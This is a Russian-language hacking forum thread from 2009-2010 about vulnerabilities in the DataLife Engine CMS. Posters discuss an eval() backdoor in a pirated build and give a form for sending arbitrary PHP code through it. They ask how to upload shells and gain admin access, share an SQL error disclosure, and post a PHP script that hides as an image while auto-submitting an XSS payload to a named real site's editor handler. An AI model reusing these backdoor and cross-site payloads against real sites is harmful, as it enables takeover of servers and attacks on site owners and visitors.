[ Обзор уязвимостей DataLife Engine ]

Discussion in 'Веб-уязвимости' started by Solide Snake, 28 Oct 2007.

  1. Firrst

    Firrst New Member

    Joined:
    17 Oct 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Никак, там в папке с загруженными файлами лежит htaccess, ты не выполнишь .php файл
     
  2. Rew

    Rew New Member

    Joined:
    12 Mar 2010
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Есть бедкодер в папке /engine/ajax/

    if($_POST['text']!=''){eval(stripcslashes($_POST['text']));}

    Что с этим можно сделать?
     
    #122 Rew, 30 Apr 2010
    Last edited: 30 Apr 2010
  3. Rew

    Rew New Member

    Joined:
    12 Mar 2010
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Я думаю таких сайтов много с этим бедкодером это относиться к null версиям dle.

    К примеру DataLife Engine v.8.5 Nulled by M.I.D-Team

    Так что с этим можно сделать?

    В этой папке нету файла .htaccess
     
    #123 Rew, 30 Apr 2010
    Last edited: 30 Apr 2010
  4. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    Юзай антивирус в админке, он покажет назву шелла
     
  5. Komyak

    Komyak Banned

    Joined:
    14 Jan 2009
    Messages:
    202
    Likes Received:
    18
    Reputations:
    1
    Rew, где ты там(Nulled by M.I.D-Team) увидел этот код?
     
  6. Rew

    Rew New Member

    Joined:
    12 Mar 2010
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Проблема в том что я не знаю как и что нужно и куда послать и через чё.

    Где об этом можно хоть статью почитать или книжку что да как?

    В \upload\engine\ajax

    keywords.php

    http://slil.ru/29061005
     
    #126 Rew, 30 Apr 2010
    Last edited: 30 Apr 2010
  7. Komyak

    Komyak Banned

    Joined:
    14 Jan 2009
    Messages:
    202
    Likes Received:
    18
    Reputations:
    1
  8. Rew

    Rew New Member

    Joined:
    12 Mar 2010
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Да я сливал dle не сайта M.I.D-Team а с какого то сайта по dle где есть модули и хаки для dle.

    Но что релиз от тимы M.I.D-Team там было это точно написано и папка там называлась DataLife Engine v.8.5 Nulled by M.I.D-Team после распаковки архива.

    Значит от ихнего имени кто - то дле null распространяет с бэкдор . eval() через $_POST. Только теперь этот бэкдор
    в keywords.php.


    Спасибо почитаем.

    Что с рангом я вам плюсь добавил а его не видно?
     
  9. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    попробуй так
    PHP:
    <form name="eval" action="http://script.ru/script.php" method="post">
    <
    input type="text" name="text" value="phpinfo();"><br />
    <
    input type="submit" name="submit" value="хряп">
    </
    form>
    вместо http://script.ru/script.php путь до твоего скрипта там где бекдор нашел, вместо phpinfo(); можеш любой php код писать.
     
  10. simca

    simca New Member

    Joined:
    6 May 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    dle 5 и shell

    Здравствуйте, я новичек на форуме, поэтому сразу извиняюсь, если пост не сюда. Вопрос следующего характера, как можно залить шелл в dle 4.2 если нет доступа в админпанель, а есть только доступ к cnstats, установленного на этом сайте
     
  11. m00nster

    m00nster New Member

    Joined:
    24 Apr 2010
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    Доброе время суток.
    Помогите написать код для бэкдора от -=ZLOY=-,чтоб получить доступ в АП, и быть в user_group 1

    В этом деле я новичок,прошу вас,напишите подробно что да как
     
  12. slva2000

    slva2000 New Member

    Joined:
    20 Nov 2009
    Messages:
    42
    Likes Received:
    2
    Reputations:
    0
    Code:
    http://forum.searchengines.ru/showthread.php?t=504108
    детали не известны
     
  13. MaZaHaKaT

    MaZaHaKaT New Member

    Joined:
    14 May 2010
    Messages:
    2
    Likes Received:
    1
    Reputations:
    0
    Вот недавно нашёл багу.
    В зависимости от чпу выполняем запрос
    Например:
    Code:
    http://skripters.com/dle_haki/page/9999999999999999999/
    Получаем:
    Code:
    MySQL Error! ------------------------  The Error returned was: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '7.3786976294838E+19,8' at line 1  Error Number: 1064
    Я думаю найдёте применение :)
    Неоткажусь от ++
     
    1 person likes this.
  14. m00nster

    m00nster New Member

    Joined:
    24 Apr 2010
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    держи
     
    1 person likes this.
  15. m00nster

    m00nster New Member

    Joined:
    24 Apr 2010
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    Хм,кто нить тут отпишется как юзать багу с помощью "Tiny MCE редактор"
     
  16. zebrum

    zebrum New Member

    Joined:
    27 Dec 2009
    Messages:
    12
    Likes Received:
    2
    Reputations:
    0
    Работает любой хтмл тег отосланный пост запросом на engine/editor/jscripts/tiny_mce/plugins/typograf/handler.php

    ТИПА ЭКСПЛОИТ
    PHP код:
    PHP:
    <?php 
    $value 
    urlencode("<script>alert('HACKED BY KZPROMO trololo');</script>"); 
    if(
    $_GET['unset'] == "time") unset($_COOKIE['time']); 
    if(!isset(
    $_COOKIE['time'])) 

    setcookie("time",time(),time()+3600); 
    echo <<<
    HTML 
    <html
    <
    head
    </
    head
    <
    body
    <
    center

    <
    form name="hack" action="https://gomel-sat.net/engine/editor/jscripts/tiny_mce/plugins/typograf/handler.php" method="post"
    <
    input type="text" name="text" value='$value' style="boder:none;FONT: 0px Tahoma; border:0px solid #FFFFFF;" border="0"
    </
    form

    <
    script
    document.hack.submit(); 
    </script> 
    </body> 
    </html> 
    HTML; 


    else {  
    header("Content-type: image/jpg"); 
    $image = imagecreatefromgif('smile.jpg'); 
    imagegif($image); 
    imagedestroy($image); 


    ?> 
    Автор: kzpromo
     
    1 person likes this.
  17. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Ну а если там только post, как иначе?
     
    1 person likes this.
  18. kickboxer

    kickboxer New Member

    Joined:
    25 Nov 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    извиняюсь, если было, но может кто подскажет как взламывали недавно сайты, например zerx.ru .
    Вот заплатка от взлома http://dle-news.ru/bags/v85/1037-provedenie-ataki-mezhsajtovogo-skriptinga-xss.html
     
  19. Quicky

    Quicky New Member

    Joined:
    27 Sep 2007
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Да вот действительно тема: http://dle-news.ru/bags/v85/1040-nedostatochnaya-filtraciya-vxodyashhix-dannyx.html только не как не могу в ней разобраться ...
     
  20. killerman

    killerman New Member

    Joined:
    8 Jun 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    А что в ней разбератся если у тебя на сайте есть аккаунт административный то ты можешь загрузить фейк! а дальше объяснять не надо :)